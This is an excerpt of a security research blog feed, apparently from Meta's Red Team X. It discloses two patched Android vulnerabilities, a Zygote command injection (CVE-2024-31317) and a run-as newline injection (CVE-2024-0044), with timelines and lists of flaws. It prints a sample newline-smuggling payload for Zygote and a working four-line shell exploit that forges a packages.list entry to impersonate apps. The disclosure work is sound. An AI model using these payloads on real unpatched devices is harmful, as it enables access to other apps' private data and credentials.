<p>This is a stroke of luck, as it gives us a ready-made way to issue two socket writes with a decent delay between them. BufferedWriter has a <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:libcore/ojluni/src/main/java/java/io/BufferedWriter.java;l=73">buffer size of 8192</a>, smaller than Zygote’s buffer. By padding System Server’s command to exactly 8192 bytes before inserting our malicious command, we force BufferedWriter to write those 8192 bytes first. Zygote will ignore the padding, but it won’t ignore the remainder of our exploit, since—Linux scheduler willing—that will arrive in a separate <code class="language-plaintext highlighter-rouge">read()</code> call.</p>

<p>To make this outcome more likely, we can insert a large number of commas at the end of our setting value, causing <code class="language-plaintext highlighter-rouge">maybeSetApiDenylistExemptions()</code> to spend time looping after the first write but before the second. Those commas also increase the legitimate command’s argument count, but that’s not a problem as long as we ensure the first 8192 bytes contain at least that many newlines. We just need to stay within two limits:</p>

<ol>
  <li>We shouldn’t write more total bytes than Zygote’s command buffer can hold. If we do, we risk crashing Zygote if it happens to read them all at once.</li>
  <li>The first command’s argument count shouldn’t exceed Zygote’s limit, which it sets to <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_ZygoteCommandBuffer.cpp;l=139-141">half its buffer size</a>, because that will also cause a crash.</li>
</ol>

<p>We wrote a script to generate an proof-of-concept that combines these techniques, respecting all relevant constraints. See the Appendix for detailed discussion of a sample output. In testing across multiple devices, our PoC reliably executes on the first attempt.</p>

<h3 id="challenge-2-return-value-confusion">Challenge #2: return value confusion</h3>

<p>A successful exploit degrades or prevents subsequent process launches until a reboot. That’s because the injected Zygote command outputs extra result bytes that System Server doesn’t consume. System Server uses a single connection to Zygote for all non-<a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/jni/com_android_internal_os_Zygote.cpp;l=2109-2117">USAP</a> commands, so those bytes stick around until it tries to spawn another process, at which point it reads them instead of that process’s PID. System Server <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/services/core/java/com/android/server/am/ActivityManagerService.java;l=4496-4498">won’t bind a process</a> without record of its PID, and processes that fail to bind get killed.</p>

<p>We avoided this issue on Android 12+ by slightly modifying our exploit: we declared an argument count for our injected command that exceeded the number of newlines in our final socket write, which forced Zygote to perform an additional socket read while parsing it. That read ate whatever command happened to follow ours (overwhelmingly likely to be a process spawn) and prevented Zygote from executing it. Our malicious command in effect replaced that legitimate command, and System Server consumed its PID (actually our PID) as normal, allowing subsequent PIDs to remain in sync.</p>

<p>This modification also made persistence feasible, as the setting can retain its malicious value across reboots without disrupting the boot process.</p>

<h2 id="attack-scenarios">Attack scenarios</h2>

<h3 id="scenario-1-privilege-escalation">Scenario #1: privilege escalation</h3>

<p>Any app <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/packages/SettingsProvider/src/com/android/providers/settings/SettingsProvider.java;l=1471-1472">with android.permission.WRITE_SECURE_SETTINGS</a> can write to hidden_api_blacklist_exemptions and trigger the exploit. Android <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/res/AndroidManifest.xml;l=4502-4505">declares</a> that permission’s protection level as <code class="language-plaintext highlighter-rouge">signature|privileged|development|role|installer</code>, which means unprivileged apps can’t request it<sup id="fnref:grantability" role="doc-noteref"><a href="#fn:grantability" class="footnote" rel="footnote">4</a></sup>. Various preinstalled apps hold it, though, and an attacker who compromises any of those can use this bug to further escalate privilege.</p>

<h3 id="scenario-2-adb-shell">Scenario #2: ADB shell</h3>

<p>The ADB shell can also read and write settings; it even has a <code class="language-plaintext highlighter-rouge">settings</code> command to make doing so easy. An attacker with physical access to an unlocked device—or a user who wants to bypass system policy (e.g. MDM restrictions) on a device in their possession—can trigger the exploit that way.</p>

<h3 id="scenario-3-signed-config">Scenario #3: <a href="https://source.android.com/docs/core/runtime/signed-config">Signed Config</a></h3>

<p>There’s one other way to set hidden_api_blacklist_exemptions, which is why it exists to begin with: any app (even an <a href="https://developer.android.com/topic/google-play-instant">Instant App</a>!) may contain a <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:cts/hostsidetests/signedconfig/app/version1_AndroidManifest.xml;l=22-25">special pair of &lt;meta-data&gt; tags</a> in its manifest, containing</p>

<ol>
  <li>a Base64-encoded value to store in hidden_api_blacklist_exemptions; and</li>
  <li>an ECDSA signature of that value by a <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/services/core/java/com/android/server/signedconfig/SignatureVerifier.java;l=47-49">hardcoded, Google-controlled key</a>.</li>
</ol>

<p>If such an app is installed and the signature is valid, Android will immediately <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/services/core/java/com/android/server/signedconfig/GlobalSettingsConfigApplicator.java;l=98-101">apply the setting value</a>, potentially triggering the exploit.</p>

<p>We believe the signature verification and surrounding logic to be correctly implemented, so it’s likely that the only actor who can exploit devices this way is Google themselves. Nevertheless, most Android devices are not 1st-party Google devices, and this bug could give Google much greater access to those devices than OEMs and users expect. Notably, CTS <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:cts/hostsidetests/signedconfig/hostside/src/com/android/cts/signedconfig/SignedConfigHostTest.java;l=146-152">requires</a> that Google-signed metadata be accepted, meaning most OEMs couldn’t remove this exploitation path even if they tried.</p>

<p>The intended purpose of this functionality is benign: hidden_api_blacklist_exemptions was <a href="https://android-review.googlesource.com/c/platform/frameworks/base/+/647221">created</a> to be nothing more than an escape hatch to the <a href="https://developer.android.com/guide/app-compatibility/restrictions-non-sdk-interfaces">undocumented API restrictions</a> that Android 9 introduced<sup id="fnref:signedconfig-motivation" role="doc-noteref"><a href="#fn:signedconfig-motivation" class="footnote" rel="footnote">5</a></sup>. Were it not for the vulnerability we’ve detailed, malicious values would pose no great threat.</p>

<h2 id="response">Response</h2>

<p>We reported our findings privately to Google on December 12th, 2023. On December 20th, the Android Security Team rated it High severity. Google shared a patch for the immediate issue with us on March 26th, 2024, which we reviewed and verified prevents all known exploitation paths. That is <a href="https://android.googlesource.com/platform/frameworks/base/+/e25a0e394bbfd6143a557e1019bb7ad992d11985">the patch Google released today</a>.</p>

<p>Today’s patch does not address the architectural weaknesses we identified, like Zygote’s use of a hand-rolled stream protocol or ZygoteProcess’s lack of a reusable function to safely serialize commands, as those entail bigger changes and are not directly exploitable. Google has has communicated that they’re considering such changes going forwards, though.</p>

<h2 id="issue-list">Issue list</h2>

<p>For ease of reference, here’s a numbered list of the technical flaws we identified in this report:</p>

<ol>
  <li>[Bug] Newlines contained in hidden_api_blacklist_exemptions are not sanitized before inclusion in Zygote’s newline-delimited wire protocol, allowing command injection.</li>
  <li>[Weakness] As of Android 12, Zygote will only process one command per <code class="language-plaintext highlighter-rouge">read()</code> call, dropping any extra bytes. It’s never permissible to condition behavior on the <code class="language-plaintext highlighter-rouge">read()</code> boundaries of a stream, as the kernel can batch or split writes arbitrarily. (Our original report to Google identified this as an exploitable bug, but Google correctly pointed out that all existing Zygote clients are fully synchronous, meaning at most one command will be buffered in practice.)</li>
  <li>[Weakness] <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/android/os/ZygoteProcess.java">ZygoteProcess</a> has no single abstraction to serialize an array of arguments into a wire-format command, which means each newly-implemented Zygote command presents a fresh opportunity for an injection bug.</li>
  <li>[Weakness] Zygote uses UNIX stream sockets, which require a custom message framing protocol, instead of UNIX datagram sockets, which provide built-in framing.</li>
  <li>[Weakness] Zygote uses a rudimentary, hand-rolled command protocol instead of a mature RPC protocol like Binder.</li>
</ol>

<h2 id="appendix-proof-of-concept">Appendix: proof-of-concept</h2>

<p>For illustrative purposes, let’s imagine that BufferedWriter buffers only 64 bytes and that Zygote limits commands to 100 bytes (meaning it will abort if a single read ever returns 100 bytes or more). Plugging those parameters into our script, along with a 3-argument injected command—<code class="language-plaintext highlighter-rouge">["--some", "--malicious", "command"]</code>, results in the following value for hidden_api_blacklist_exemptions:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>




AAAAAAAAAAAAAAAAAAAAAAAAAAA3
--some
--malicious
command
,,,,X
</code></pre></div></div>

<p>System Server sees this as a comma-separated list with 5 <strong>entries</strong>. Note that we distinguish “entries” from <strong>arguments</strong>: the former are the comma-separated list items provided to System Server via hidden_api_blacklist_exemptions, while the latter are the Zygote command arguments that go out on the wire. In this example, the 5 entries are as follows…</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[
  "\n\n\n\n\nAAAAAAAAAAAAAAAAAAAAAAAAAAA3\n--some\n--malicious\ncommand\n",
  "",
  "",
  "",
  "X",
]
</code></pre></div></div>

<p>…but because we’ve injected newlines, those entries don’t correspond directly to arguments. Instead, the first entry spans 5 arguments and then continues on to start a second 64-byte block with our malicious command! Here’s what <code class="language-plaintext highlighter-rouge">maybeSetApiDenylistExemptions()</code> ends up writing to Zygote’s socket (brackets for annotation, as before):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>6                              [arg count: special arg + 5 entries]
--set-api-denylist-exemptions  [uncontrolled arg #1: action to take]
                               [beginning of entry #1: empty args #2-#6]




AAAAAAAAAAAAAAAAAAAAAAAAAAA3   [pad to exactly 64 bytes, then arg count]
--some                         [args #1-#3: malicious command]
--malicious
command

                               [entries #2-#5, emitted in loop, each
                                lengthening the delay between writes]

X
</code></pre></div></div>

<p>There are just enough <code class="language-plaintext highlighter-rouge">A</code> characters to make <code class="language-plaintext highlighter-rouge">3</code>, the beginning of our malicious command, occur at offset 64. And there are just enough empty “delay entries” to bring the total size to 99, as high as it can go without exceeding Zygote’s length limit. That gives us the best timing we can get while still keeping failures silent.</p>

<p>Note that the last delay entry isn’t empty like the rest. That’s to work around the fact that Java’s <code class="language-plaintext highlighter-rouge">String.split()</code> function, used by System Server to parse the setting value, <a href="https://developer.android.com/reference/java/lang/String#split(java.lang.String)">discards trailing empty strings</a>.</p>

<h2 id="appendix-disclosure-timeline">Appendix: disclosure timeline</h2>

<ul>
  <li>June–November, 2023: We find and document the bug after noticing weaknesses in Zygote’s wire protocol.</li>
  <li>December 12th, 2023: We report our findings to Google, who passes them to the Android Security Team.</li>
  <li>December 20th, 2023: Google notifies us that they’ve rated the issue High Severity.</li>
  <li>February 6th, 2024: We ask Google for a progress update. They respond on February 20th that they’re developing a fix but have no ETA.</li>
  <li>February 15th, 2024: We extend our tentative disclosure date from March 12th (90 days after disclosure) to April 4th to accomodate planned time off within RTX.</li>
  <li>March 12th, 2024: Google proposes a call to discuss their fix, which we schedule for March 26th.</li>
  <li>March 26th, 2024: On the call, Google shares a proposed patch with us and we agree on a coordinated disclosure date of June 3rd, 2024. Google also disputes our assertion that Zygote’s <code class="language-plaintext highlighter-rouge">read()</code> semantics pose a security threat in practice, which we accept after further investigation. Google requests a draft of this post to help with their messaging.</li>
  <li>April 11th, 2024: Google offers us a $7,000 bounty for our report, which we request be donated to charity. (Google, like Meta, doubles bounties paid to charity.)</li>
  <li>May 6th, 2024: Meta is sent the June 2024 Android Security Bulletin preview, and RTX confirms the patch we saw is present and learns the CVE ID, CVE-2024-31317.</li>
  <li>May 21st, 2024: Google shares the CVE ID with us via our bug report.</li>
  <li>June 3rd, 2024: We share a draft of this post with Google (and apologize for not sharing one earlier). Later in the day, it, <a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-x9q9-2r8c-hg2p">our disclosure</a>, the <a href="https://source.android.com/docs/security/bulletin/2024-06-01">April ASB</a>, and <a href="https://www.cve.org/CVERecord?id=CVE-2024-31317">CVE-2024-31317</a> all go live.</li>
</ul>

<h2 id="footnotes">Footnotes</h2>
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:cap-setuid" role="doc-endnote">
      <p>The vast majority of processes neither have the appropriate capability (<code class="language-plaintext highlighter-rouge">CAP_SETUID</code>) nor run in an SELinux domain that lets them use that capability. <a href="#fnref:cap-setuid" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:system-server" role="doc-endnote">
      <p>System Server is a highly trusted process, halfway between an app and a daemon, that routes intents, starts and stops apps, and hosts <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:system/sepolicy/public/service.te;l=57-268">most app-facing APIs</a>. It runs with a dedicated SELinux domain and never stops, like a daemon. But it’s forked from Zygote and has a package (named simply <code class="language-plaintext highlighter-rouge">android</code>), like an app. To avoid a circular dependency, Zygote forks System Server at boot by running a <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/com/android/internal/os/ZygoteInit.java;l=746-757">hardcoded command</a>. <a href="#fnref:system-server" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:java-parser" role="doc-endnote">
      <p>The Java parser performs an equivalent operation by <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/java/com/android/internal/os/ZygoteConnection.java;l=120">constructing an entirely new ZygoteCommandBuffer</a> after each command. <a href="#fnref:java-parser" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:grantability" role="doc-endnote">
      <p>It would be declared as <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r11:frameworks/base/core/res/res/values/attrs_manifest.xml;l=195-211"><code class="language-plaintext highlighter-rouge">normal</code> or <code class="language-plaintext highlighter-rouge">dangerous</code></a> if grantable to unprivileged apps. <a href="#fnref:grantability" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:signedconfig-motivation" role="doc-endnote">
      <p><a href="https://source.android.com/docs/core/runtime/signed-config">The idea</a> was that, if one of the forbidden APIs was later found to be needed for backwards-compatibility, Google could retroactively exempt that API from enforcement by adding an appropriately-signed setting value in a release of the AndroidX support library. <a href="#fnref:signedconfig-motivation" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Tom Hebb, Red Team X</name></author><category term="exploitation" /><summary type="html"><![CDATA[We have discovered a vulnerability in Android that allows an attacker with the WRITE_SECURE_SETTINGS permission, which is held by the ADB shell and certain privileged apps, to execute arbitrary code as any app on a device. By doing so, they can read and write any app’s data, make use of per-app secrets and login tokens, change most system configuration, unenroll or bypass Mobile Device Management, and more. Our exploit involves no memory corruption, meaning it works unmodified on virtually any device running Android 9 or later, and persists across reboots.]]></summary></entry><entry><title type="html">Bypassing the “run-as” debuggability check on Android via newline injection</title><link href="https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html" rel="alternate" type="text/html" title="Bypassing the “run-as” debuggability check on Android via newline injection" /><published>2024-03-04T00:00:00+00:00</published><updated>2024-03-04T00:00:00+00:00</updated><id>https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery</id><content type="html" xml:base="https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html"><![CDATA[<p>An attacker with ADB access to an Android device can trick the “run-as” tool into believing any app is debuggable. By doing so, they can read and write private data and invoke system APIs as if they were most apps on the system—including many privileged apps, but not ones that run as the <code class="language-plaintext highlighter-rouge">system</code> user. Furthermore, they can achieve persistent code execution as Google Mobile Services (GMS) or as apps that use its SDKs by altering executable code that GMS caches in its data directory.</p>

<p>Google assigned the issue <a href="https://www.cve.org/CVERecord?id=CVE-2024-0044">CVE-2024-0044</a> and fixed it in the <a href="https://source.android.com/docs/security/bulletin/2024-03-01">March 2024 Android Security Bulletin</a>, which becomes public today. Most device manufacturers received an advance copy of the Bulletin a month ago and have already prepared updates that include its fixes.</p>

<h2 id="vulnerability-details">Vulnerability details</h2>

<p>On Android 12 and 13<sup id="fnref:14-not-affected" role="doc-noteref"><a href="#fn:14-not-affected" class="footnote" rel="footnote">1</a></sup>, a newly-installed app’s “installer package name” is not sanitized when set via <code class="language-plaintext highlighter-rouge">pm install</code>’s <code class="language-plaintext highlighter-rouge">-i</code> flag. Neither <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:frameworks/base/services/core/java/com/android/server/pm/PackageManagerShellCommand.java;l=3062"><code class="language-plaintext highlighter-rouge">pm</code></a> nor the underlying <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:frameworks/base/services/core/java/com/android/server/pm/PackageInstallerService.java;l=643-653">PackageInstallerService</a> check that it doesn’t contain special characters, let alone that it references an installed package.</p>

<p>Although special characters in the installer package name are harmlessly escaped when written to <code class="language-plaintext highlighter-rouge">/data/system/packages.xml</code>, they are <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:frameworks/base/services/core/java/com/android/server/pm/Settings.java;l=2805">not escaped</a> when written to <code class="language-plaintext highlighter-rouge">/data/system/packages.list</code>, which replicates certain package metadata in a simple newline- and space-delimited format. By providing a name with newlines and spaces, an attacker with ADB shell access can inject an arbitrary number of fake fields and entries<sup id="fnref:entry-order" role="doc-noteref"><a href="#fn:entry-order" class="footnote" rel="footnote">2</a></sup> into <code class="language-plaintext highlighter-rouge">packages.list</code>.</p>

<p>One user<sup id="fnref:other-users" role="doc-noteref"><a href="#fn:other-users" class="footnote" rel="footnote">3</a></sup> of <code class="language-plaintext highlighter-rouge">packages.list</code> is <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/core/run-as/run-as.cpp">run-as</a>, which lets the ADB shell run code in the context of a given app. run-as is designed to reject non-<a href="https://developer.android.com/privacy-and-security/risks/android-debuggable">debuggable</a> apps, but it queries the app’s debuggability—along with its UID, SELinux context, and data directory—from <code class="language-plaintext highlighter-rouge">packages.list</code>. By injecting a fake entry that preserves the latter but alters the former, the attacker can bypass the debuggability check and become nearly any app on the system.</p>

<p>We say “nearly” because run-as does have some extra defense-in-depth checks, the most notable of which is that it won’t assume non-app UIDs (including the <code class="language-plaintext highlighter-rouge">system</code> user, reserved for the most highly-privileged apps) even if <code class="language-plaintext highlighter-rouge">packages.list</code> says it should. It also doesn’t assume the same SELinux context as the real app, since it only considers <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/seapp_contexts;l=177-178"><code class="language-plaintext highlighter-rouge">seapp_contexts</code></a> with <code class="language-plaintext highlighter-rouge">fromRunAs=true</code>: this makes no difference for unprivileged apps, since <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/runas_app.te">runas_app</a> is strictly more privileged than <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/untrusted_app_all.te">untrusted_app</a>, but it does prevent the attacker from taking actions gated to <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/priv_app.te">priv_app</a> or <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/platform_app.te">platform_app</a>—even as an app that normally could.</p>

<p>The issue is compounded by a separate logic bug in run-as that lets it target privapps. Typically, that would be forbidden by the checks in <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/core/run-as/run-as.cpp;l=98-143"><code class="language-plaintext highlighter-rouge">check_data_path()</code></a>, which try to ensure that</p>

<ol>
  <li>every parent of the app’s data directory is owned by <code class="language-plaintext highlighter-rouge">system</code>, and</li>
  <li>the data directory itself is owned by the app’s UID.</li>
</ol>

<p>Since run-as <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/public/runas.te">isn’t allowed</a> to <code class="language-plaintext highlighter-rouge">stat()</code> privapp_data_file, check #2 should fail for a privapp either with a UID mismatch (if the fake app has the wrong data directory) or with a permission denial (if it has the right one). However, the <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/core/run-as/run-as.cpp;l=73-96"><code class="language-plaintext highlighter-rouge">check_directory()</code></a> helper that performs each check includes a special case for the path <code class="language-plaintext highlighter-rouge">/data/user/0</code>. Although intended only to allow that path to be a symlink, the special case inadvertently also skips UID validation. So by setting the fake app’s data path to <code class="language-plaintext highlighter-rouge">/data/user/0</code>, the attacker can satisfy run-as’s internal security checks. And once in runas_app, they can read and write privapp_data_file because Android somewhat perplexingly <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/app.te;l=254-256">allows</a> any app to do that.</p>

<p>On Android devices with Google Mobile Services (GMS), the attacker can gain persistence within GMS (escalating to <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/gmscore_app.te">gmscore_app</a> in the process) by rewriting the cached ODEX/VDEX files in <code class="language-plaintext highlighter-rouge">/data/user_de/0/com.google.android.gms/app_chimera/m/*/oat/</code>, which contain unsigned executable code that GMS loads. Some of that code is also loaded into apps that use Google APIs, allowing persistence there too. This isn’t a bug per se, but it does highlight the importance of <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/priv_app.te;l=17-26">enforcing W|X</a> in privapp data directories.</p>

<h2 id="exploitation">Exploitation</h2>

<p>A basic exploit takes just 4 lines:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Pretty ugly way to get the package's UID, but I couldn't find a simpler one.</span>
<span class="nv">UID</span><span class="o">=</span><span class="si">$(</span>pm list packages <span class="nt">-U</span> | <span class="nb">sed</span> <span class="nt">-n</span> <span class="s2">"s/^package:</span><span class="nv">$1</span><span class="s2"> uid://p"</span><span class="si">)</span>

<span class="c"># This is the line we inject...</span>
<span class="nv">PAYLOAD</span><span class="o">=</span><span class="s2">"@null
victim </span><span class="nv">$UID</span><span class="s2"> 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"</span>

<span class="c"># ...and this is how we inject it.</span>
pm <span class="nb">install</span> <span class="nt">-i</span> <span class="s2">"</span><span class="nv">$PAYLOAD</span><span class="s2">"</span> any-app.apk
</code></pre></div></div>

<p>Since “installer package name” is the last field in a packages.list entry, all we have to do is provide a legitimate-looking value followed by a newline and any forged entry we want. For this PoC, we gave the forged entry a package name of “victim”, meaning <code class="language-plaintext highlighter-rouge">run-as victim</code> will switch to the UID and SELinux context described by that line. We set the UID dynamically based on the real package we intend to exploit, and all the other fields are set to fixed or dummy values:</p>

<ul>
  <li>The third field, <code class="language-plaintext highlighter-rouge">1</code> indicates the package is debuggable.</li>
  <li>The fourth, <code class="language-plaintext highlighter-rouge">/data/user/0</code>, is the data path needed to become privapps as described in the writeup.</li>
  <li>The fifth field is used to derive the SELinux domain and is set to a generic value that will work for any app targeting API &gt;= 28.</li>
  <li>The other fields don’t matter to run-as.</li>
</ul>

<h2 id="attack-scenarios">Attack scenarios</h2>

<p>A local attacker with ADB shell access to an Android 12 or 13 device with Developer Mode enabled can exploit the vulnerability to run code in the context of any non-<code class="language-plaintext highlighter-rouge">system</code>-UID app. From there, the attacker can do anything the app can, like access its private data files or read the credentials it’s stored in AccountManager. This violates the security guarantees of the <a href="https://source.android.com/docs/security/app-sandbox">Application Sandbox</a>, which is supposed to safeguard an app’s data from even the owner of the device.</p>

<p>Non-<code class="language-plaintext highlighter-rouge">system</code> privapps are vulnerable, but for those the attacker does not gain any SELinux permissions beyond what run-as grants for a normal unprivileged app. That means no access to Binder APIs <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/public/service.te">marked</a> only as <code class="language-plaintext highlighter-rouge">system_api_service</code>, for example.</p>

<h2 id="response">Response</h2>

<p>We reported this vulnerability privately to Google on October 24, 2023. Google acknowledged our report immediately, and the Android Security Team rated it as High severity the following week. On December 19th, Google informed us they’d developed a fix and planned to release it with the March Android Security Bulletin, which they acknowledged was past Meta’s default 90-day disclosure period. We offered to move our disclosure to match theirs, as is <a href="https://about.meta.com/security/vulnerability-disclosure-policy">our policy</a> when a vendor demonstrates a good-faith effort to promptly address an issue.</p>

<p>As planned, this post, <a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-m7fh-f3w4-r6v2">our accompanying disclosure</a>, and the <a href="https://source.android.com/docs/security/bulletin/2024-03-01">March ASB</a> were all released today.</p>

<h2 id="issue-list">Issue list</h2>

<p>For ease of reference, here’s a numbered list of the technical flaws we identified in this report:</p>

<ol>
  <li>[Bug] It’s possible to inject newlines and spaces into <code class="language-plaintext highlighter-rouge">packages.list</code> on Android 12 and 13.</li>
  <li>[Bug] run-as accepts <code class="language-plaintext highlighter-rouge">/data/user/0</code> as a data directory for any app.</li>
  <li>[Weakness] run-as trusts the data path from <code class="language-plaintext highlighter-rouge">packages.list</code> when <code class="language-plaintext highlighter-rouge">userId == 0</code>, even though it has enough information to construct that path itself (as demonstrated by the <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/core/run-as/run-as.cpp;l=203-209">userId != 0 case</a>).</li>
  <li>[Weakness] untrusted_app is granted broad SELinux permissions on privapp_data_file, even though (as far as we’re aware) there’s no legitimate need for write access.</li>
  <li>[Weakness] Android stores AOT-compiled ODEX/VDEX files alongside the APK they’re for, even when that APK is in an app-writable data directory. It does not apply an alternate SELinux label, such as the already-extant <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/sepolicy/private/app_neverallows.te;l=52-56">app_exec_data_file</a>, to prevent apps from altering them.</li>
</ol>

<h2 id="appendix-disclosure-timeline">Appendix: disclosure timeline</h2>

<ul>
  <li>July 23rd, 2022: We notice the <code class="language-plaintext highlighter-rouge">packages.list</code> injection vulnerability as part of unrelated Android research and build a basic run-as PoC, but other planned work prevents us from investigating further.</li>
  <li>May 5th, 2023: We return to the issue and discover the exploit can be tweaked to work for privapps too. We begin looking for interesting data files among privileged apps.</li>
  <li>June 5th, 2023: We demonstrate persistent code execution in GMS and in apps that use Google SDKs by modifying cached code GMS’s data directory.</li>
  <li>October 24, 2023: We report our findings to Google, who passes them to the Android Security Team.</li>
  <li>November 3rd, 2023: Google notifies us that they’ve rated the issue High Severity.</li>
  <li>December 12th, 2023: We ask Google why they settled on High severity, as that contravenes their <a href="https://source.android.com/docs/security/overview/updates-resources#severity">published rubric</a> which says that exploits requiring Developer Mode are Low severity at most. Google responds that attacks “against the device or an app on the device”, as opposed to “against the device user themselves”, are not subject to that restriction.</li>
  <li>December 19th, 2023: Google says they’ve developed a fix for the injection vulnerability but won’t be able to release it until the March 4th, 2024 Android Security bulletin. They ask for an extension of our tentative 90-day disclosure date, which we agree to.</li>
  <li>December 22nd, 2023: We meet briefly with members of the Google VRP and Android Security teams to discuss details of the disclosure plan. Google tells us that the report qualifies for a $7,000 bounty.</li>
  <li>January 16th, 2024: Google officially offers us the bounty, which we ask them on January 26th to donate to charity. (Google, like Meta, doubles bounties paid to charity.)</li>
  <li>February 6th, 2024: We ask Google to confirm the CVE ID of CVE-2024-0044, which we learned from the March ASB partner preview, as they had not yet told us. They confirm it.</li>
  <li>March 4th, 2024: This post, <a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-m7fh-f3w4-r6v2">our disclosure</a>, and the <a href="https://source.android.com/docs/security/bulletin/2024-03-01">March ASB</a> all go live.</li>
</ul>

<h2 id="footnotes">Footnotes</h2>
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:14-not-affected" role="doc-endnote">
      <p>In Android 14, <code class="language-plaintext highlighter-rouge">PackageInstallerService</code> ensures the installer package name references an installed package, so the issue is no longer exploitable. However, the check is still fairly high in the call stack and the <a href="https://cs.android.com/android/_/android/platform/frameworks/base/+/f052ba7eb8fba18cf93326a5c77a5ffd6ce85266">change that added it</a> seems to have fixed this issue inadvertently rather than intentionally, so we still recommend additional defense in depth. <a href="#fnref:14-not-affected" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:entry-order" role="doc-endnote">
      <p>Entries in <code class="language-plaintext highlighter-rouge">packages.list</code> are deterministically ordered by Java’s <code class="language-plaintext highlighter-rouge">String.hashCode()</code>, so it’s possible to craft a package that appears at the very top whose injected entries a parser will always see before real entries with the same package name. The name <code class="language-plaintext highlighter-rouge">com.hashed.first.WHGCXIP</code> is one of many that hashes to the lowest possible value and <code class="language-plaintext highlighter-rouge">com.hashed.last.JJEJTOC</code> is likewise for the highest. Since <code class="language-plaintext highlighter-rouge">run-as</code> doesn’t care about package name, we didn’t have to use this trick in our PoC. <a href="#fnref:entry-order" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:other-users" role="doc-endnote">
      <p><code class="language-plaintext highlighter-rouge">packages.list</code> has other clients, like <a href="https://cs.android.com/android/platform/superproject/+/android-13.0.0_r74:system/extras/simpleperf/simpleperf_app_runner/simpleperf_app_runner.cpp;l=85">simpleperf_app_runner</a>, but <code class="language-plaintext highlighter-rouge">run-as</code> is the one for which this issue causes by far the greatest security threat. <a href="#fnref:other-users" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Tom Hebb, Red Team X</name></author><category term="exploitation" /><summary type="html"><![CDATA[An attacker with ADB access to an Android device can trick the “run-as” tool into believing any app is debuggable. By doing so, they can read and write private data and invoke system APIs as if they were most apps on the system—including many privileged apps, but not ones that run as the system user. Furthermore, they can achieve persistent code execution as Google Mobile Services (GMS) or as apps that use its SDKs by altering executable code that GMS caches in its data directory.]]></summary></entry><entry><title type="html">Missing signs: how several brands forgot to secure a key piece of Android</title><link href="https://rtx.meta.security/exploitation/2024/01/30/Android-vendors-APEX-test-keys.html" rel="alternate" type="text/html" title="Missing signs: how several brands forgot to secure a key piece of Android" /><published>2024-01-30T00:00:00+00:00</published><updated>2024-01-30T00:00:00+00:00</updated><id>https://rtx.meta.security/exploitation/2024/01/30/Android-vendors-APEX-test-keys</id><content type="html" xml:base="https://rtx.meta.security/exploitation/2024/01/30/Android-vendors-APEX-test-keys.html"><![CDATA[<p>We recently discovered that Android devices from multiple major 